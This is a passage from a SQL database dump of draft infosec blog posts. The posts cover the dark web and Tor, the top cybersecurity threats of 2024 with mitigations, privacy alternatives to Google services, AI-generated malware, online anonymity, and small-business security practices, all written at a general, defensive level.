The most common software used to access the dark web is called Tor (The Onion Router).\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">The Onion Router (Tor)</h3>\r\nTor is a special web browser that allows you to access the dark web. It\'s called \"The Onion Router\" because it uses a technique called \"onion routing\" to protect users\' privacy:\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li>When you use Tor, your internet traffic is encrypted and sent through a series of computers around the world, called \"nodes\" or \"relays.\"</li>\r\n 	<li>Each node only knows the location of the immediately preceding and following nodes.</li>\r\n 	<li>This process is like peeling layers of an onion, hence the name.</li>\r\n</ol>\r\nThis method makes it extremely difficult for anyone to trace the origin or destination of the information, providing anonymity to users.\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Why Do People Use the Dark Web?</h3>\r\nThe dark web has both legitimate and illegal uses:\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Legitimate Uses:</h3>\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li>Privacy and anonymity for people in countries with oppressive governments</li>\r\n 	<li>Secure communication for journalists, activists, and whistleblowers</li>\r\n 	<li>Some organizations, like newspapers and even government agencies, have dark websites to allow anonymous information sharing</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Illegal Uses:</h3>\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li>Buying and selling illegal goods and services, such as drugs, weapons, and stolen data</li>\r\n 	<li>Sharing illegal content</li>\r\n 	<li>Coordinating criminal activities</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Accessing the Dark Web</h3>\r\nWhile it\'s not illegal to access the dark web, it\'s important to understand the risks:\r\n<ol class=\"marker:text-textOff list-decimal 
pl-8\">\r\n 	<li>You need special software, typically the Tor browser</li>\r\n 	<li>Websites on the dark web have addresses that end in \".onion\" instead of \".com\" or \".org\"</li>\r\n 	<li>It\'s much slower than regular internet browsing due to the multiple layers of encryption</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Staying Safe</h3>\r\nIf you decide to explore the dark web, keep these safety tips in mind:\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li>Use a VPN for added security</li>\r\n 	<li>Never share personal information.</li>\r\n 	<li>Be aware that many scams and dangerous content exist on the dark web</li>\r\n 	<li>Remember that despite the anonymity, law enforcement agencies actively work to combat illegal activities on the dark web</li>\r\n</ol>\r\nThe dark web is a hidden part of the internet that offers anonymity and privacy. While it has legitimate uses, it\'s also associated with illegal activities. Understanding how it works can help you navigate the internet more safely and make informed decisions about your online activities. Remember, for most people, there\'s rarely a need to access the dark web. The surface web provides ample resources for everyday internet use, and it\'s generally much safer and easier to navigate.', '', NULL, NULL, 1, 'draft', '2024-10-26 18:33:37', '2026-01-12 21:41:44', 'Information Security', 'Dark Web and How It Works', '', NULL),
(102, 'Top 10 Cybersecurity Threats in 2024 and How to Mitigate Them', 'top-10-cybersecurity-threats-in-2024-and-how-to-mitigate-them', 'As we progress through 2024, the cybersecurity landscape is evolving rapidly, with new threats emerging and old ones becoming more sophisticated. Cybercriminals are continuously innovating, and organizations and individuals alike must stay vigilant. Here are the <strong>Top 10 Cybersecurity Threats</strong> you should be aware of in 2024, along with vulnerabilities and strategies to mitigate them.\r\n<h4>1. <strong>AI-Powered Phishing Attacks</strong></h4>\r\n<strong><img class=\"size-medium wp-image-3427 alignleft\" src=\"https://infoseclabs.io/wp-content/uploads/2024/09/dangers-of-ai-malware-300x195.jpg\" alt=\"\" width=\"300\" height=\"195\" />Threat:</strong>\r\nPhishing has always been a prominent attack vector, but in 2024, cybercriminals are leveraging AI to craft hyper-realistic phishing emails that are harder to detect. AI can study an organization’s internal communications, mimic writing styles, and create phishing messages that appear legitimate.\r\n\r\n<strong>Vulnerability:</strong>\r\nThe human factor remains the primary weakness. Employees are often the targets, as they can be easily deceived by convincing, AI-generated phishing emails.\r\n\r\n<strong>Mitigation:</strong>\r\n<ul>\r\n 	<li><strong>Security Awareness Training:</strong> Continuous phishing simulations and training help employees recognize phishing attempts.</li>\r\n 	<li><strong>Advanced Email Filtering:</strong> Use AI-based email filters that can detect subtle patterns of phishing attempts.</li>\r\n 	<li><strong>Multi-Factor Authentication (MFA):</strong> Implement MFA to prevent unauthorized access, even if credentials are compromised.</li>\r\n</ul>\r\n<h4>2. 
<strong>Deepfake Cyber Attacks</strong></h4>\r\n<strong><img class=\"size-medium wp-image-3451 alignleft\" src=\"https://infoseclabs.io/wp-content/uploads/2024/10/deepfake_ai-300x171.jpeg\" alt=\"\" width=\"300\" height=\"171\" />Threat:</strong>\r\nDeepfake technology is improving rapidly, allowing attackers to create fake audio and video that appear real. In 2024, we see deepfakes being used for fraud, impersonation, and disinformation campaigns.\r\n\r\n<strong>Vulnerability:</strong>\r\nTrust in digital media and communications is being exploited. Businesses could be tricked into financial scams where deepfakes of CEOs or executives issue fraudulent directives.\r\n\r\n<strong>Mitigation:</strong>\r\n<ul>\r\n 	<li><strong>Deepfake Detection Tools:</strong> Use AI-based solutions that can analyze audio and video files to identify manipulation.</li>\r\n 	<li><strong>Verification Protocols:</strong> Always verify sensitive communications through secondary channels like phone calls or secure messaging apps.</li>\r\n 	<li><strong>Employee Awareness:</strong> Train employees to be skeptical of video and audio communications that seem out of character.</li>\r\n</ul>\r\n<h4>3. <strong>Ransomware 3.0</strong></h4>\r\n<strong><img class=\"size-medium wp-image-2972 alignleft\" src=\"https://infoseclabs.io/wp-content/uploads/2024/07/ransomware-300x225.jpeg\" alt=\"\" width=\"300\" height=\"225\" />Threat:</strong>\r\nRansomware continues to evolve, with attackers now not only encrypting data but also threatening to release sensitive data if their demands aren’t met. 
This form of double extortion is growing, with attackers increasing pressure on victims by exposing breaches publicly.\r\n\r\n<strong>Vulnerability:</strong>\r\nPoorly secured networks, inadequate data backups, and a lack of encryption make organizations vulnerable to ransomware attacks.\r\n\r\n<strong>Mitigation:</strong>\r\n<ul>\r\n 	<li><strong>Regular Backups:</strong> Maintain up-to-date offline backups of critical data.</li>\r\n 	<li><strong>Endpoint Detection &amp; Response (EDR):</strong> Use EDR tools to monitor and detect abnormal activities.</li>\r\n 	<li><strong>Network Segmentation:</strong> Segment your network to prevent the lateral spread of ransomware once it penetrates one part of the system.</li>\r\n</ul>\r\n<h4>4. <strong>Supply Chain Attacks</strong></h4>\r\n<strong>Threat:</strong>\r\nAttackers target weak links in the supply chain to infiltrate larger organizations. They exploit vulnerabilities in third-party software, hardware, or service providers to gain access to secure networks.\r\n\r\n<strong>Vulnerability:</strong>\r\nThird-party vendors often don’t adhere to the same security standards, and businesses might not have visibility into their partners’ security practices.\r\n\r\n<strong>Mitigation:</strong>\r\n<ul>\r\n 	<li><strong>Vendor Risk Management:</strong> Regularly assess and monitor the security posture of all third-party vendors.</li>\r\n 	<li><strong>Zero Trust Architecture:</strong> Implement zero trust principles where no entity, inside or outside the network, is trusted by default.</li>\r\n 	<li><strong>Contractual Security Clauses:</strong> Ensure that contracts with third parties include stringent security requirements and liability clauses.</li>\r\n</ul>\r\n<h4>5. <strong>Cloud Misconfigurations</strong></h4>\r\n<strong>Threat:</strong>\r\nWith the rapid adoption of cloud services, improper configuration of cloud resources remains a significant threat. 
Misconfigurations can expose sensitive data, making it easily accessible to attackers.\r\n\r\n<strong>Vulnerability:</strong>\r\nDefault security settings, improper access control, and insufficient monitoring often leave cloud environments vulnerable to exploitation.\r\n\r\n<strong>Mitigation:</strong>\r\n<ul>\r\n 	<li><strong>Continuous Monitoring:</strong> Use cloud security posture management (CSPM) tools to continuously audit configurations.</li>\r\n 	<li><strong>Least Privilege Principle:</strong> Ensure that users only have access to the cloud resources necessary for their role.</li>\r\n 	<li><strong>Regular Audits:</strong> Conduct regular security audits of cloud environments to ensure compliance with security policies.</li>\r\n</ul>\r\n<h4>6. <strong>IoT-Based Attacks</strong></h4>\r\n<strong>Threat:</strong>\r\nThe proliferation of Internet of Things (IoT) devices in industries, homes, and public spaces creates numerous entry points for cybercriminals. Many IoT devices lack sufficient security features, making them prime targets for exploitation.\r\n\r\n<strong>Vulnerability:</strong>\r\nWeak or default passwords, outdated firmware, and limited security capabilities make IoT devices vulnerable to attacks, especially DDoS and botnet attacks.\r\n\r\n<strong>Mitigation:</strong>\r\n<ul>\r\n 	<li><strong>Strong Authentication:</strong> Use strong, unique passwords for IoT devices and enable two-factor authentication where possible.</li>\r\n 	<li><strong>Firmware Updates:</strong> Regularly update firmware to patch known vulnerabilities.</li>\r\n 	<li><strong>Network Isolation:</strong> Isolate IoT devices on a separate network to limit exposure in case of compromise.</li>\r\n</ul>\r\n<h4>7. <strong>Insider Threats</strong></h4>\r\n<strong>Threat:</strong>\r\nIn 2024, insider threats are becoming more sophisticated, with employees, contractors, or partners intentionally or unintentionally causing harm. 
Whether driven by financial gain, disgruntlement, or carelessness, insider threats can be harder to detect than external attacks.\r\n\r\n<strong>Vulnerability:</strong>\r\nOrganizations with weak monitoring, excessive permissions, or poor employee oversight are particularly vulnerable to insider threats.\r\n\r\n<strong>Mitigation:</strong>\r\n<ul>\r\n 	<li><strong>User Behavior Analytics (UBA):</strong> Use AI-powered tools to monitor employee behavior and detect anomalies.</li>\r\n 	<li><strong>Least Privilege Access:</strong> Limit employees\' access to only the resources they need to perform their jobs.</li>\r\n 	<li><strong>Whistleblower Programs:</strong> Create internal reporting mechanisms to detect potential insider threats before they escalate.</li>\r\n</ul>\r\n<h4>8. <strong>Quantum Computing Threats</strong></h4>\r\n<strong>Threat:</strong>\r\nQuantum computing, while still in its early stages, has the potential to break traditional cryptographic algorithms. In 2024, this threat is not yet fully realized but is a growing concern for future-proofing data security.\r\n\r\n<strong>Vulnerability:</strong>\r\nAny system relying on traditional encryption methods (such as RSA and ECC) is vulnerable to being compromised once quantum computers become capable of breaking these algorithms.\r\n\r\n<strong>Mitigation:</strong>\r\n<ul>\r\n 	<li><strong>Post-Quantum Cryptography:</strong> Start exploring quantum-resistant encryption algorithms.</li>\r\n 	<li><strong>Data Prioritization:</strong> Protect the most sensitive and long-term data with the highest encryption standards.</li>\r\n 	<li><strong>Stay Informed:</strong> Keep abreast of developments in quantum computing and cryptography to prepare for upcoming challenges.</li>\r\n</ul>\r\n<h4>9. <strong>API Security Vulnerabilities</strong></h4>\r\n<strong>Threat:</strong>\r\nAs more applications rely on APIs to communicate with each other, APIs become an attractive target for attackers. 
Insecure APIs can lead to data breaches, denial of service, or unauthorized access.\r\n\r\n<strong>Vulnerability:</strong>\r\nUnsecured APIs, weak authentication mechanisms, and improper rate limiting can expose APIs to exploitation.\r\n\r\n<strong>Mitigation:</strong>\r\n<ul>\r\n 	<li><strong>API Gateway Security:</strong> Use an API gateway to enforce authentication, rate limiting, and traffic monitoring.</li>\r\n 	<li><strong>Input Validation:</strong> Ensure that all inputs to the API are properly validated to prevent injection attacks.</li>\r\n 	<li><strong>Access Control:</strong> Implement strict access control policies for APIs to limit who can access specific endpoints.</li>\r\n</ul>\r\n<h4>10. <strong>Zero-Day Exploits</strong></h4>\r\n<strong>Threat:</strong>\r\nZero-day exploits are vulnerabilities that are unknown to software vendors and are actively exploited by attackers before a patch is available. In 2024, attackers are becoming more adept at discovering and weaponizing these vulnerabilities.\r\n\r\n<strong>Vulnerability:</strong>\r\nSoftware that is not frequently updated or monitored is at high risk of zero-day exploits, leaving organizations exposed until patches are released.\r\n\r\n<strong>Mitigation:</strong>\r\n<ul>\r\n 	<li><strong>Patch Management:</strong> Ensure that software and systems are regularly updated with the latest security patches.</li>\r\n 	<li><strong>Threat Intelligence:</strong> Use threat intelligence services to stay informed about potential zero-day vulnerabilities in your software stack.</li>\r\n 	<li><strong>Endpoint Protection:</strong> Deploy advanced endpoint protection solutions that can detect and block exploit attempts, even for unknown vulnerabilities.</li>\r\n</ul>\r\n<h3></h3>\r\n2024 presents new challenges in cybersecurity as attackers become more innovative and sophisticated. Organizations can significantly reduce their risk by understanding the top threats and implementing robust mitigation strategies. 
Whether it\'s using advanced security tools, continuously training employees, or adopting new technologies like post-quantum cryptography, staying one step ahead of attackers is key to securing your digital future.\r\n\r\nStay vigilant, and always be proactive in your approach to cybersecurity.', '', NULL, NULL, 1, 'draft', '2024-10-20 15:36:21', '2026-01-12 21:41:44', 'Information Security', 'Top 10 Cybersecurity Threats in 2024 and How to Mitigate Them', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(103, 'Consider Removing Google from Your Life for Privacy', 'consider-removing-google-from-your-life', 'Google has become so embedded in our daily lives that the mere thought of removing it can seem daunting. Whether it\'s for searching information, browsing the web, or using their cloud services, Google has positioned itself as an integral part of how we navigate the digital world. But have you ever wondered why they can offer all these top-tier services for free or at prices competitors can’t match? The answer lies in how they handle your data.\r\n<h3>The Price You Pay: Your Data</h3>\r\nGoogle’s business model heavily relies on collecting and selling user data. By analyzing your behavior, Google can predict your next move, offering you products and services that seem incredibly convenient. However, this convenience comes at a cost—your privacy.\r\n\r\nSome may argue that they don’t mind giving up some data in exchange for free services, but the scale of data collection is enormous. When your data is combined with that of millions of users, companies like Google can manipulate perceptions, impacting how entire societies think and behave. The Cambridge Analytica scandal is a prime example of how such data can be misused.\r\n\r\nWhile completely removing Google from your life might be challenging, it’s possible to reduce your dependence on their services. In this post, we’ll look at alternatives to Google services and how you can regain control of your digital privacy.\r\n<h3>1. Search Engines: Stepping Away from Google Search</h3>\r\nOne of Google’s most significant products is its search engine, but even here, there are reasons to look for alternatives. Google search results are filled with ads, and organic results are often buried beneath them. 
Google has transitioned from being a search engine to a service designed to keep you within their ecosystem.\r\n\r\nFortunately, several privacy-focused alternatives offer similar functionality without tracking your every move:\r\n<ul>\r\n 	<li><strong><a href=\"https://www.startpage.com/\" target=\"_new\" rel=\"noopener\">Startpage</a></strong> and <strong><a href=\"https://www.ecosia.org/\" target=\"_new\" rel=\"noopener\">Ecosia</a></strong>: These search engines provide Google’s results but without tracking users. While they do display ads, they aren’t personalized based on your search history.</li>\r\n 	<li><strong><a href=\"https://duckduckgo.com/\" target=\"_new\" rel=\"noopener\">DuckDuckGo</a></strong>: Known for its privacy features, DuckDuckGo doesn’t track users and offers additional features like the ability to search other sites easily with its exclamation mark feature (!bang).</li>\r\n 	<li><strong><a target=\"_new\" rel=\"noopener\">Brave Search</a></strong>: Brave\'s search engine comes with a built-in ad blocker and other privacy features, though it does collect anonymous usage data unless you turn it off.</li>\r\n 	<li><strong><a href=\"https://kagi.com/\" target=\"_new\" rel=\"noopener\">Kagi</a></strong>: For those willing to pay for a search engine, Kagi offers a premium, ad-free search experience with added features like an AI assistant and customizable search results.</li>\r\n</ul>\r\nEach of these alternatives allows you to change your default search engine easily through your browser’s settings.\r\n<h3>\r\n2. Browsers: Moving Beyond Google Chrome</h3>\r\nGoogle Chrome is another widely used product, but like the search engine, it’s designed to collect data. 
While many alternatives use Google’s Chromium engine, which gives Google a hold on the browser market, you still have privacy-focused options.\r\n<ul>\r\n 	<li><strong><a href=\"https://librewolf.net/\" target=\"_new\" rel=\"noopener\">LibreWolf</a></strong>: This Firefox-based browser prioritizes privacy and security. If you value these, LibreWolf should be your go-to. Just make sure to turn off the “delete all cookies” option if you don’t want to be logged out of sites every time you close the browser.</li>\r\n 	<li><strong><a href=\"https://brave.com/\" target=\"_new\" rel=\"noopener\">Brave Browser</a></strong>: Another Chromium-based browser, Brave blocks ads and trackers by default. However, it does come with features like Brave Wallet and Brave BAT, which you’ll need to disable manually if you don’t want them.</li>\r\n 	<li><strong><a target=\"_new\" rel=\"noopener\">Ungoogled Chromium</a></strong>: As the name suggests, this is a Chromium-based browser stripped of all Google services. While you’ll lose features like synchronization, you gain full control over your data.</li>\r\n</ul>\r\nIf you’re switching from Chrome, the migration process is relatively simple. For Firefox-based browsers, you’ll need to export and import bookmarks, history, and add-ons manually. For Chromium-based browsers, just copy the “User Data” folder to the new browser\'s directory.\r\n<h3>3. Email: Secure Your Communications</h3>\r\nIf you use Gmail, your emails are subject to data collection. Fortunately, there are secure alternatives that protect your privacy with end-to-end encryption:\r\n<ul>\r\n 	<li><strong><a target=\"_new\" rel=\"noopener\">ProtonMail</a></strong>: This popular email service encrypts your emails so that even ProtonMail can’t access them. 
It offers 1 GB of free storage, which is enough for many users, though paid plans are available.</li>\r\n 	<li><strong><a href=\"https://tutanota.com/\" target=\"_new\" rel=\"noopener\">Tutanota</a></strong>: Similar to ProtonMail, Tutanota provides encrypted email services with a free 1 GB storage option and premium plans for more storage.</li>\r\n</ul>\r\nBoth services ensure that your data remains private and inaccessible to third parties. While you could also host your own mail server with software like <strong><a href=\"https://mailcow.email/\" target=\"_new\" rel=\"noopener\">Mailcow</a></strong>, this requires more technical expertise.\r\n<h3>4. Cloud Storage: Replacing Google Drive</h3>\r\nGoogle Drive is one of the most affordable cloud storage solutions, but there are alternatives that offer greater privacy:\r\n<ul>\r\n 	<li><strong><a target=\"_new\" rel=\"noopener\">Proton Drive</a></strong>: This service offers end-to-end encryption, ensuring that your files remain private. However, it can be more expensive than Google Drive.</li>\r\n 	<li><strong><a href=\"https://cryptomator.org/\" target=\"_new\" rel=\"noopener\">CryptoMator</a></strong>: If you want to keep using Google Drive but ensure your files are secure, you can use CryptoMator. It encrypts files on your device before uploading them, preventing Google from accessing your data.</li>\r\n</ul>\r\n<h3>5. Maps: Finding Alternatives to Google Maps</h3>\r\nGoogle Maps is one of the hardest services to replace due to its functionality and up-to-date data. However, <strong><a href=\"https://organicmaps.app/\" target=\"_new\" rel=\"noopener\">Organic Maps</a></strong>, which is based on OpenStreetMap, is a good alternative for those prioritizing privacy.\r\n<h3>6. Password Managers: Ditching Google Password Manager</h3>\r\nIf you rely on Google Password Manager, your accounts could be at risk if your Google account is compromised. 
Consider these alternatives:\r\n<ul>\r\n 	<li><strong><a href=\"https://bitwarden.com/\" target=\"_new\" rel=\"noopener\">Bitwarden</a></strong>: An open-source, end-to-end encrypted password manager that syncs across devices.</li>\r\n 	<li><strong><a href=\"https://keepassxc.org/\" target=\"_new\" rel=\"noopener\">KeePassXC</a></strong>: A local password manager that keeps your passwords offline. For syncing across devices, you’ll need to use third-party solutions like Dropbox or SyncThing.</li>\r\n</ul>\r\n<h3>7. Two-Factor Authentication: Moving Away from Google Authenticator</h3>\r\nWhile Google Authenticator is popular, it doesn’t allow you to export your keys easily. Instead, you can try:\r\n<ul>\r\n 	<li><strong><a target=\"_new\" rel=\"noopener\">Ente Auth</a></strong>: An open-source, cross-platform alternative that gives you more control over your 2FA keys.</li>\r\n</ul>\r\n<h3></h3>\r\nWhile Google offers powerful and convenient services, the cost is often your privacy. By gradually moving away from Google’s ecosystem and adopting privacy-first alternatives, you can regain control over your data without sacrificing functionality.', '', NULL, NULL, 1, 'draft', '2024-10-05 13:50:34', '2026-01-12 21:41:44', 'Information Security', 'Consider Removing Google from Your Life for Privacy', '', NULL),
(104, 'AI-Generated Malware: The New Cyber Threat Everyone Should Know About', 'ai-generated-malware-the-new-cyber-threat', 'Imagine a world where the viruses attacking your computer aren\'t crafted by hackers but by machines. It sounds like something out of a sci-fi movie, but it’s happening today. Artificial intelligence (AI) is now being used to create malware—those harmful programs that can steal your personal information or mess up your system. And here’s the really unsettling part: these AI-powered threats are already out in the wild, affecting people and businesses alike.\r\n<h3>What Is AI-Generated Malware?</h3>\r\nTraditionally, malware—like viruses, spyware, and ransomware—has been created by skilled hackers who knew how to write complex code. But today, AI is making it easier for even less tech-savvy individuals to create sophisticated malware. AI has the ability to write code faster, smarter, and more accurately than a human. This means that malware can be created in a fraction of the time it used to take, and it\'s often more effective.\r\n\r\nFor example, a recent discovery by cybersecurity experts uncovered an email campaign targeting people in France. This was no ordinary phishing attempt (the kind of email that tries to trick you into giving away personal information). The malware attached to these emails appeared to be generated by AI. What made it stand out was how well-crafted the malicious code was—perfectly written and even “commented” throughout. In coding, comments are used to explain what each part of the code does, and while humans often skip this step, AI did it flawlessly. This precision makes AI-generated malware even more dangerous.\r\n<h3>How AI Is Changing the Game for Cybercriminals</h3>\r\nBefore the rise of AI in cybercrime, creating a piece of malware required a deep understanding of computer systems and coding. It was a job for highly skilled hackers. Now, AI has lowered that barrier. 
Even someone with basic knowledge of programming can use AI tools to generate malware. This means we’re not just dealing with elite hackers anymore. We’re potentially facing a flood of low-level attackers who can still do a lot of damage, thanks to AI.\r\n\r\nA recent case from June 2024 highlights how AI-generated malware is already being used in the real world. In a phishing campaign, users were sent password-protected zip files via email. Once the files were opened, they released malicious code written in VBScript and JavaScript, two types of programming languages. This malware was designed to infect the computer by secretly changing system settings and staying hidden so that even antivirus programs wouldn’t catch it. AI helped create this code, making it more persistent and sneaky than usual.\r\n\r\nAccording to HP Wolf Security’s Q2 2024 report, there’s a disturbing trend: AI is now helping even inexperienced hackers create malware faster than ever before. AI can write code that works across different types of operating systems, such as Windows, Mac, and Linux. It can also help attackers customize their attacks based on the specific system they’re targeting, making it even more difficult to defend against.\r\n<h3>Why Should You Care?</h3>\r\nYou might be wondering why this matters to you. After all, most people assume cyberattacks are something that happens to big companies or government organizations, not to everyday individuals. But that’s no longer the case. AI is making it easier for cybercriminals to cast a wider net, meaning more people are at risk of falling victim to malware.\r\n\r\nFor example, AI can generate more convincing phishing emails that look like they’re coming from your bank, your workplace, or even a friend. Because the malware created by AI can be more complex, it can evade the typical security measures that would usually stop less sophisticated threats. 
In other words, the same antivirus program that protected you last year might not be enough to defend against today’s AI-powered malware.\r\n\r\nAnother reason to be concerned is the speed at which these threats are evolving. Since AI can generate and improve code so quickly, the traditional methods of catching and stopping malware are struggling to keep up. This rapid development means that your personal data, your financial information, and even your devices are at greater risk.\r\n<h3>How to Protect Yourself</h3>\r\nSo, what can you do? The good news is that while AI is making malware more dangerous, there are still steps you can take to protect yourself and your devices. Here are a few practical tips:\r\n<ol>\r\n 	<li><strong>Keep Your Software Up to Date</strong>: One of the simplest ways to protect yourself is to regularly update your operating system and software. These updates often include security patches that protect against the latest threats. Many AI-generated malware attacks exploit vulnerabilities in outdated software, so staying up to date is your first line of defense.</li>\r\n 	<li><strong>Be Cautious with Emails and Attachments</strong>: Since phishing attacks are a common way AI-generated malware is spread, be extra cautious with any emails that seem suspicious. Don’t open attachments from unknown senders, and be wary of emails that ask for personal information or have unusual requests.</li>\r\n 	<li><strong>Use Strong, Unique Passwords</strong>: Weak or reused passwords are an easy target for cybercriminals. Use a password manager to generate and store complex, unique passwords for each of your accounts.</li>\r\n 	<li><strong>Enable Two-Factor Authentication (2FA)</strong>: Adding an extra layer of security to your accounts with 2FA makes it harder for attackers to gain access, even if they manage to steal your password.</li>\r\n 	<li><strong>Stay Informed</strong>: The world of cybersecurity is constantly evolving, and so are the threats. 
By staying informed about the latest trends, like AI-generated malware, you’ll be better prepared to defend yourself. Follow trustworthy tech news sources and consider subscribing to cybersecurity updates.</li>\r\n</ol>\r\n<h3>The Future of Cybersecurity</h3>\r\nAs AI continues to develop, so will the threats we face. Cybersecurity experts are working hard to come up with new defenses, but the reality is that AI is pushing the boundaries of what we’re used to. In the near future, we might see malware being created, deployed, and updated by AI without any human intervention at all.\r\n\r\nFor now, the best thing we can do is to stay informed and proactive about our online security. AI-generated malware may sound like a problem for tech experts to solve, but it affects all of us. The more we understand these new threats, the better prepared we’ll be to protect ourselves, our families, and our devices.\r\n\r\nAI-generated malware is already here, and it’s changing the way we think about cybersecurity. With AI helping even low-level attackers create more dangerous and sophisticated malware, the risk to everyday users has increased significantly. But by staying informed, cautious, and proactive, we can defend ourselves against these new threats.\r\n\r\n&nbsp;', '', NULL, NULL, 1, 'draft', '2024-09-30 00:34:34', '2026-01-12 21:41:44', 'Information Security', 'AI-Generated Malware: The New Cyber Threat Everyone Should Know About', '', NULL),
(105, 'How to Stay Anonymous Online: A Beginner\'s Guide to Protecting Your Privacy', 'how-to-stay-anonymous-online-a-beginners-guide-to-protecting-your-privacy', 'The idea of staying anonymous online has become more important than ever. You might think it’s easy to hide your identity on the internet, but it’s actually more complicated than most people believe. Whether you’re trying to protect your privacy or simply reduce your online presence, here’s a beginner-friendly guide to help you stay anonymous on the internet.\r\n<h4><strong>What Does Being Anonymous Online Mean?</strong></h4>\r\nBeing anonymous online means limiting the amount of personal information you share, such as your name, email, location, or any other identifying details. While complete anonymity may be difficult to achieve, it’s possible to take steps that reduce your digital footprint and make it harder for others to track you.\r\n<h4><strong>Start With Limiting Personal Information</strong></h4>\r\nThe first and most important step to staying anonymous is to limit the personal information you share. Avoid using your real name, address, or contact details on social media profiles or websites. For example, create a different username that doesn’t link back to your real identity. You can use different personas or characters for different platforms to avoid being easily identified.\r\n\r\nFor instance, create a persona for Instagram and another for Twitter, with unique usernames that have no connection to each other or your real identity. This is the first layer of defense when it comes to being anonymous online.\r\n<h4><strong>Create Strong, Unique Passwords</strong></h4>\r\nPasswords are one of the biggest weak points when it comes to staying anonymous. If you use the same password across multiple accounts, it becomes easy for someone to trace those accounts back to you if one gets hacked. 
Always use strong, unique passwords for each of your online accounts.\r\n\r\nA good tip is to use a password manager to help you store and create complex passwords that are hard to crack. This way, you won’t have to remember them all, and it will significantly improve your anonymity.\r\n<h4><strong>Using VPNs for Anonymity</strong></h4>\r\nA VPN (Virtual Private Network) is a service that hides your real IP address and encrypts your internet connection, making it harder for anyone to track your online activity. However, be cautious when choosing a VPN service. While VPNs provide some privacy, they are not foolproof. Many VPN services can be forced to hand over data to law enforcement agencies if required.\r\n\r\nIt’s important to use a reliable VPN provider that doesn’t keep logs of your activities. Even so, remember that VPNs aren’t a perfect solution for staying anonymous online—it\'s just one tool in your privacy toolbox.\r\n<h4><strong>Exploring TOR for Enhanced Anonymity</strong></h4>\r\nIf you want to go a step further in hiding your online activity, you can use TOR (The Onion Router). TOR routes your internet connection through several servers around the world, making it extremely difficult to track your IP address. This is a popular tool for those seeking a higher level of anonymity, especially when accessing websites that value privacy.\r\n\r\nHowever, even TOR has its limitations. Law enforcement agencies have been known to set up fake servers, called nodes, to monitor traffic. While TOR is a useful tool, it’s not a guarantee for absolute privacy. It’s best to combine TOR with other privacy measures like VPNs for better protection.\r\n<h4><strong>Anonymous Email and Messaging</strong></h4>\r\nMany people make the mistake of using their personal email addresses for everything. But to remain anonymous, it’s essential to use anonymous email services. Gmail or Yahoo might seem convenient, but they are not built for privacy. 
Services like ProtonMail and Guerrilla Mail are great alternatives because they don’t require personal information when signing up, and they encrypt your emails.\r\n\r\nSimilarly, for messaging, avoid apps like WhatsApp if you\'re looking for better privacy options. Instead, use secure messaging apps like Signal, which provide end-to-end encryption and don’t store your messages on their servers.\r\n<h4><strong>Be Cautious on Social Media</strong></h4>\r\nSocial media is one of the biggest pitfalls when it comes to anonymity. Even if you use a fake name, the posts, comments, and pictures you share can reveal a lot about your identity. Be mindful of what you post online, and never share sensitive or personal information that could be traced back to you.\r\n\r\nIf you’re serious about anonymity, consider using multiple social media accounts with different personas. Be careful about the photos you post, as they can contain metadata, such as the location where the picture was taken. To stay anonymous, strip the metadata from your images before uploading them.\r\n<h4><strong>Don’t Use Anonymity for Illegal Activities</strong></h4>\r\nOne key point to remember: anonymity is for protecting your privacy, not for illegal activities. Law enforcement agencies have advanced tools and techniques to uncover your real identity, even when you use tools like VPNs and TOR. Many people have been caught because they thought they were invisible online, only to be traced due to their mistakes.\r\n\r\nAnonymity helps you maintain privacy, but it doesn’t give you a free pass to break the law. The best way to stay safe and anonymous is to always operate within legal boundaries.\r\n<h4><strong>Use Secure Browsers and Search Engines</strong></h4>\r\nIf you’re serious about your privacy, you should also use secure browsers and search engines. Mainstream browsers like Chrome or Safari collect and share a lot of information about you. 
Instead, try privacy-focused browsers like Brave, which offer built-in privacy settings that block trackers and ads.\r\n\r\nWhen it comes to search engines, avoid Google. Instead, try search engines like DuckDuckGo or Startpage, which don’t track your search history or personal information. These tools will help you reduce the amount of data being collected about you while you browse the web.\r\n<h4><strong>Anonymity is Possible, But Not Foolproof</strong></h4>\r\nStaying anonymous online requires effort and the right tools. While it’s possible to reduce your digital footprint, it’s almost impossible to be completely invisible on the internet. By limiting personal information, using strong passwords, employing VPNs and TOR, and being cautious on social media, you can greatly increase your level of anonymity.', '', NULL, NULL, 1, 'draft', '2024-09-21 21:42:42', '2026-01-12 21:41:44', 'Information Security', 'How to Stay Anonymous Online: A Beginner\'s Guide to Protecting Your Privacy', '', NULL),
(106, 'Cybersecurity for Small Businesses: Best Practices', 'cybersecurity-for-small-businesses-best-practices', 'As a small business owner, it’s easy to think that only large corporations are targeted by hackers. However, the reality is quite different—small businesses are often seen as low-hanging fruit because they typically don’t invest as much in cybersecurity. This makes it essential to put strong defenses in place. In this article, we’ll outline practical steps your business can take to safeguard itself from cyber threats.\r\n<h3>1. <strong>Employee Education</strong></h3>\r\n<img class=\"size-medium wp-image-3406 alignleft\" src=\"https://infoseclabs.io/wp-content/uploads/2024/09/cybersecurity-training-illustration-3-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />The most common entry point for cybercriminals is through your employees, which is why educating your staff should be the first step in your cybersecurity strategy. Even with the most advanced security measures in place, one employee mistakenly clicking on a phishing email or downloading malware can undo all your efforts. Training your team on recognizing cyber threats, like phishing scams, is crucial for maintaining a secure business environment.\r\n\r\nEducation should be ongoing, not a one-time event. New threats emerge regularly, and your staff must be equipped to identify them. Regular cybersecurity workshops or online training sessions are effective ways to keep everyone informed. When your employees know what to watch for, they’re less likely to fall victim to social engineering attacks, which are the most common tactics used by hackers. By making cybersecurity training a priority, you transform your workforce into a strong line of defense against attackers.\r\n<h3>2. <strong>Strong Password 